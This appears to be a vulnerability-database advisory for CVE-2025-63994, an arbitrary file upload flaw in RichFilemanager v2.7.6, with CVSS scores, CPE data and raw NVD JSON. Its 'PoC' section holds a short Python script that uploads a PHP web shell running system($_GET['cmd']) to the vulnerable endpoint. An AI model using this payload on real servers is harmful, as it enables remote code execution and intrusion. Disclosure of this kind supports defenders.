Security Vulnerability Report
中文
CVE-2025-63994 CVSS 9.8 CRITICAL

CVE-2025-63994

Published: 2025-11-18 18:16:14
Last Modified: 2025-12-31 02:04:57

Description

An arbitrary file upload vulnerability in the /php/UploadHandler.php component of RichFilemanager v2.7.6 allows attackers to execute arbitrary code via uploading a crafted file.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:psolom:richfilemanager:2.7.6:*:*:*:*:*:*:* - VULNERABLE
RichFilemanager v2.7.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 import requests target = 'http://target.com/richfilemanager/php/UploadHandler.php' payload = '<?php system($_GET["cmd"]); ?>' files = {'file': ('shell.php', payload, 'application/x-php')} response = requests.post(target, files=files) print(response.text)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63994", "sourceIdentifier": "[email protected]", "published": "2025-11-18T18:16:14.103", "lastModified": "2025-12-31T02:04:56.717", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An arbitrary file upload vulnerability in the /php/UploadHandler.php component of RichFilemanager v2.7.6 allows attackers to execute arbitrary code via uploading a crafted file."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:psolom:richfilemanager:2.7.6:*:*:*:*:*:*:*", "matchCriteriaId": "32F137E3-E3DB-44F4-9898-323CB6CFBE36"}]}]}], "references": [{"url": "https://github.com/psolom/RichFilemanager/issues/412", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}